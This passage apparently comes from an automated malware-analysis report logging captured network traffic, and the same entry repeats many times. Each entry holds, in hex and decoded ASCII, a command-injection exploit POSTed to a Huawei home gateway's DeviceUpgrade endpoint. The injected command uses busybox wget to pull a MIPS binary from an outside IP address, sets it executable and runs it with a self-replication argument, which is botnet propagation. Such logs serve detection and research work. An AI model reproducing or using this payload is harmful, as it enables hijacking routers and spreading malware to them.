20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 